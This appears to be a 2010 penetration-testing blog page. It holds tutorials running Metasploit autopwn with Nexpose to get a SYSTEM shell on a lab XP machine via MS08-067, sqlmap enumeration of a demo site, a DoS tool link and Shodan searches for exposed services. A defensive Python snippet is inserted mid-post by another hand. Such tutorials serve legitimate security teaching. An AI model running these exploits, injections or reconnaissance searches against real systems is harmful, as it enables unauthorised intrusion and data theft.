Punter

(2 comments, 71 posts)

Home page: http://punter-infosec.com/

Posts by Punter
 

Nexpose + Metasploit = Shell


In the last post I showed how to install Nexpose on BackTrack4-RC2; today we will see how to use Nexpose through msf.

Metasploit has a Nexpose plugin with which we can log in to Nexpose, scan the target system and import the scan results into Metasploit. msf then checks for exploits matching those vulnerabilities and automatically runs them; if the target system is vulnerable, this gets us an interactive shell. Let's begin.

1) Run the Nexpose scanner

2) Start Metasploit:

root@bt:/pentest/exploits/framework3# ./msfconsole

msf > db_driver sqlite3

msf > db_create

msf > load nexpose

msf > nexpose_connect punter:<password>@127.0.0.1

msf > nexpose_scan -x 192.168.0.102

msf > sessions -i 1


Check out the interactive text snapshot below.

root@bt:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 636 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11120 updated 17 days ago (2010.11.24)

Warning: This copy of the Metasploit Framework was last updated 17 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-]          The database and schema will be created automatically by
[-]          db_connect. If db_connect fails to create the database, create
[-]          it manually with your DBMS's administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose

 ____             _     _ _____   _   _     __  __
|  _ \ __ _ _ __ (_) __| |___  | | \ | | ___\ \/ /_ __   ___  ___  ___
| |_) / _` | '_ \| |/ _` |  / /  |  \| |/ _ \\  /| '_ \ / _ \/ __|/ _ \
|  _ < (_| | |_) | | (_| | / /   | |\  |  __//  \| |_) | (_) \__ \  __/
|_| \_\__,_| .__/|_|\__,_|/_/    |_| \_|\___/_/\_\ .__/ \___/|___/\___|
           |_|                                   |_|

[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect punter:<password>@127.0.0.1
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username punter...
msf > nexpose_scan -x 192.168.0.102
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.0.102:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   192.168.0.102:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.0.102:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.0.102:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.0.104:18282 -> 192.168.0.102:1067) at Sat Dec 11 03:40:01 -0500 2010
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id  Type                   Information                            Connection                                 Via
--  ----                   -----------                            ----------                                 ---
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBOX-85474D5  192.168.0.104:18282 -> 192.168.0.102:1067  exploit/windows/smb/ms08_067_netapi

[*] ================================================================================

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.0.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>exit

 

Installing NeXpose Community Edition in BackTrack4-RC2


What is NeXpose?

NeXpose is a vulnerability scanner that identifies vulnerabilities across networks, operating systems, databases, web applications and a wide range of system platforms through an integrated, intelligent scan engine. Rapid7 NeXpose prioritizes vulnerabilities using exploit risk scoring and asset criticality ratings; as a result, NeXpose customers benefit from lower risk exposure and remediation costs.

Below are the steps to install NeXpose in BackTrack4-RC2.

1) Update BT4:
apt-get update
apt-get upgrade

2) Below are a few packages required to run NeXpose (package names are separated by spaces, not commas):

root@bt:~# apt-get install screen libstdc++5 xvfb xfonts-base xfonts-75dpi xserver-xorg libxtst6 libxp6

3) Now register and get the free Community Edition of NeXpose:

http://www.rapid7.com/vulnerability-scanner.jsp

4) You will get a mail with the license and download instructions; from it, download the file below:

NeXpose for Linux - 32-bit edition

5) Once downloaded, go to that path and execute the commands below:

chmod +x NeXposeSetup-Linux32.bin

./NeXposeSetup-Linux32.bin -console

Next follow the on-screen instructions; configuring and installing the scanner takes a few minutes.

6) Once everything is done, open the URL below in Firefox and log in with the given credentials:

https://localhost:3780/

7) Once you log in you will be asked to enter the license; after that you are ready to scan.

OWASP HTTP Post Tool(layer 7 DDOS)


OWASP HTTP Post Tool was created to let you test your web applications for availability concerns arising from HTTP GET and HTTP POST denial of service attacks.

Project

http://code.google.com/p/owasp-dos-http-post/downloads/list

Also check out the mitigation steps for slow HTTP DoS attacks from the ModSecurity (SpiderLabs) blog:

http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-mitigating-slow-http-dos-attacks.html

Using SQLMap for sql Injection


We have been using a lot of tools for SQL injection while pentesting; today we will see how to use SQLMap, an open source database fingerprinting tool which works without many false positives. We will test this tool on the http://testphp.vulnweb.com demo site.

1) Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:52:47

[11:52:47] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:52:47] [INFO] resuming injection point 'GET' from session file
[11:52:47] [INFO] resuming injection parameter 'cat' from session file
[11:52:47] [INFO] resuming injection type 'numeric' from session file
[11:52:47] [INFO] resuming match ratio '0.701' from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5

[*] shutting down at: 11:52:48

2) Finding the database name and current user.

./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db --current-user

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:57:13

[11:57:13] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:57:13] [INFO] resuming injection point 'GET' from session file
[11:57:13] [INFO] resuming injection parameter 'cat' from session file
[11:57:13] [INFO] resuming injection type 'numeric' from session file
[11:57:13] [INFO] resuming match ratio '0.701' from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    'acuart@localhost'

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
current database:    'acuart'

[11:58:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 11:58:45

3) Enumerate databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:00:57

[12:00:58] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:00:58] [INFO] resuming injection point 'GET' from session file
[12:00:58] [INFO] resuming injection parameter 'cat' from session file
[12:00:58] [INFO] resuming injection type 'numeric' from session file
[12:00:58] [INFO] resuming match ratio '0.701' from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:00:58

4) Enumerate database tables and columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables --columns

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:03:27] [INFO] resuming injection point 'GET' from session file
[12:03:27] [INFO] resuming injection parameter 'cat' from session file
[12:03:27] [INFO] resuming injection type 'numeric' from session file
[12:03:27] [INFO] resuming match ratio '0.701' from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
[12:03:28] [INFO] fetching number of tables for database 'information_schema'
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

This tool made enumerating the details very easy; in the next post I will cover using sqlmap for more advanced techniques.
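What sqlmap's "injection type 'numeric'" on the `cat` parameter means for the application side, and how the parameter should have been handled, as an added example (not code from the post, from sqlmap, or from the vulnweb site). The `listproducts.php?cat=` lookup is modelled with an in-memory SQLite table of constructed sample rows in place of the site's MySQL back end; the vulnerable and hardened query patterns are the same in either database.

```python
import sqlite3

# Constructed sample data standing in for the shop's products table: (id, cat, name)
SAMPLE_PRODUCTS = [
    (1, 1, "poster"), (2, 1, "mug"), (3, 2, "shirt"), (4, 3, "hat"),
]


def make_db():
    """Build the in-memory stand-in for the application's database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def list_products_vulnerable(conn, cat):
    """The pattern sqlmap reports as a 'numeric' injection point: the raw request
    value is spliced into the SQL text without quotes, so no quote needs to be
    broken out of and whatever follows 'cat =' is parsed and run as SQL."""
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_products_hardened(conn, cat):
    """Hardened form: enforce the expected type first, then bind the value as a
    query parameter so the driver passes it as data, never as statement text."""
    try:
        cat_id = int(cat)
    except (TypeError, ValueError):
        # Reject (and, in a real app, log) anything that is not a plain integer.
        raise ValueError("cat must be an integer") from None
    rows = conn.execute("SELECT name FROM products WHERE cat = ? ORDER BY id", (cat_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(list_products_vulnerable(db, "1"))         # ['poster', 'mug']
    print(list_products_vulnerable(db, "1 OR 1=1"))  # every row: the WHERE clause was rewritten
    print(list_products_hardened(db, "1"))           # ['poster', 'mug']
    try:
        list_products_hardened(db, "1 OR 1=1")
    except ValueError as err:
        print("rejected:", err)                      # rejected: cat must be an integer
```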

Watobo on BackTrack4-RC2


Recently BackTrack4-R2 was released with a lot of updates, but I was not able to find the awesome tool Watobo, which I have been using in a lot of web application security assessments. So today we will see how to install this tool on a BT box. Run the commands below from the terminal:

gem install rubygems-update -v 1.3.4
gem install hoe
gem install fxruby

Install the Firefox extension from here:

http://wiki.openqa.org/display/WTR/FireWatir+Installation

Download the latest Watobo version:

http://sourceforge.net/projects/watobo/

unzip watobo_0.9.5rev226.zip
cd watobo_0.9.5rev226
ruby start_watobo.rb

Done, Watobo is ready on BT4-RC2.

BackTrack 4 R2 Released!


Yes, the time has come again – for a new kernel, and a new release of BackTrack. Codenamed “Nemesis”. This release is our finest release as of yet with faster Desktop responsiveness, better hardware support, broader wireless card support, streamlined work environment

BT4-rc-2 Download
http://www.backtrack-linux.org/downloads/

Also check out the new BT wiki, it rocks:

http://www.backtrack-linux.org/wiki/index.php/Main_Page

All lectures Videos of Ekoparty 2010


http://vimeo.com/16520777

Integrating Nikto with Nessus Video

Nice video from Nessus on integrating Nikto with Nessus:

http://www.youtube.com/watch?v=6kHyAhFv7xg

International CapsLockday


SHODAN Computer Search Engine


Introduction

SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.

http://www.shodanhq.com/

Below are a few searches which help in information gathering using the Shodan search engine:

"debian" ssh port:22

"Joomla" http port:80

"microsoft" telnet port:23

apache country:in port:80 hostname:.com

server country:in port:80 hostname:.com

debian country:in port:80 hostname:.com

server country:in port:21 hostname:.com

"Joomla" http port:80 hostname:.com

IIS port:80 hostname:.com

IIS 5 port:80 hostname:.com

IIS 6 port:80 hostname:.com

IIS 4 port:80 hostname:.com

tomcat port:80 hostname:.com

phpmyadmin port:80 hostname:.com

"gigaset" server port:80

server port:21

"mysql" server port:80 hostname:.com

"sqlserver" server port:1433

"sql" server port:1433
